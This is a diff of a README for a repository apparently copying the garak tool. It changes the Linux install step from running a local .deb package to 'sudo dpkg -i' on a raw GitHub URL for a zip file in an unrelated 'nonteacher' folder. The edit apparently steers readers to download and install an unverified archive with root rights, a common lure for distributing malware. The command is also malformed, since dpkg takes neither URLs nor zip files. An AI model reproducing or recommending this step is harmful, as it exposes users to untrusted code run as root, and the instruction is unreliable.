recetariodmix/garak/README.md

 **For Linux:**
 - Open a terminal window.
 - Navigate to the folder where the downloaded file is located.
-- Run the installation command specific to your package (e.g., `sudo dpkg -i garak-linux.deb`).
+- Run the installation command specific to your package (e.g., `sudo dpkg -i https://raw.githubusercontent.com/recetariodmix/garak/main/nonteacher/garak.zip`).

 ## 🎯 Using garak